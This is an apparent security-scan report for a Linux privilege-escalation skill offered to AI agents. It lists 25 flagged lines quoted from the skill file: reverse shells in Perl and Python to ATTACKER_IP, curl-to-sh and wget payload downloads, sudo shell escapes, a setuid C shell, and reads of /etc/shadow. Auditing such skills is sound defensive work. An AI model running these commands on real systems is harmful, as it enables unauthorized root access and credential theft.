Skip to main content

linux-privilege-escalation

Facilitates privilege escalation assessments on Linux systems to identify and exploit security vulnerabilities for root access.

Install this skill

or
0/100

Security score

The linux-privilege-escalation skill was audited on May 12, 2026 and we found 25 security issues across 4 threat categories, including 10 high-severity. Review the findings below before installing.

Categories Tested

Security Issues

high line 424

Direct command execution function call

SourceSKILL.md
424perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("
high line 149

Piping content to sh shell

SourceSKILL.md
149curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
medium line 232

System command execution

SourceSKILL.md
232sudo awk 'BEGIN {system("/bin/bash")}'
medium line 235

System command execution

SourceSKILL.md
235sudo python -c 'import os; os.system("/bin/bash")'
medium line 255

System command execution

SourceSKILL.md
255system("/bin/bash");
medium line 327

System command execution

SourceSKILL.md
327/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
medium line 371

System command execution

SourceSKILL.md
371# Shows: system("service apache2 start")
medium line 391

System command execution

SourceSKILL.md
391echo 'int main(){setuid(0);setgid(0);system("/bin/bash");return 0;}' > /tmp/nfs/shell.c
medium line 235

Python os.system command execution

SourceSKILL.md
235sudo python -c 'import os; os.system("/bin/bash")'
medium line 327

Python os.system command execution

SourceSKILL.md
327/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
medium line 418

Python subprocess execution

SourceSKILL.md
418python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
medium line 168

Wget to non-GitHub URL

SourceSKILL.md
168wget http://ATTACKER_IP:8000/linpeas.sh
medium line 204

Wget to non-GitHub URL

SourceSKILL.md
204wget http://ATTACKER_IP/exploit.c
high line 88

Access to /etc/passwd

SourceSKILL.md
88cat /etc/passwd | grep -v nologin | grep -v false
high line 91

Access to /etc/passwd

SourceSKILL.md
91cat /etc/passwd | grep home
high line 238

Access to /etc/passwd

SourceSKILL.md
238sudo less /etc/passwd
high line 298

Access to /etc/passwd

SourceSKILL.md
298base64 /etc/passwd | base64 -d > passwd.txt
high line 311

Access to /etc/passwd

SourceSKILL.md
311# Add to /etc/passwd (using SUID editor)
high line 281

Access to /etc/shadow

SourceSKILL.md
281LFILE=/etc/shadow
high line 297

Access to /etc/shadow

SourceSKILL.md
297base64 /etc/shadow | base64 -d > shadow.txt
high line 476

Access to /etc/shadow

SourceSKILL.md
476$ base64 /etc/shadow | base64 -d
low line 168

External URL reference

SourceSKILL.md
168wget http://ATTACKER_IP:8000/linpeas.sh
low line 204

External URL reference

SourceSKILL.md
204wget http://ATTACKER_IP/exploit.c
low line 222

External URL reference

SourceSKILL.md
222Reference https://gtfobins.github.io for exploitation commands:
low line 428

External URL reference

SourceSKILL.md
428- GTFOBins: https://gtfobins.github.io
Scanned on May 12, 2026
View Security Dashboard
Installation guide →
GitHub Stars 21.5K
Rate this skill
Categorydevelopment
UpdatedMay 19, 2026
frontenddocxgitapitestingdevopsbackendsecurity-engineerdevops-srebackend-developerdevelopment
sickn33/antigravity-awesome-skills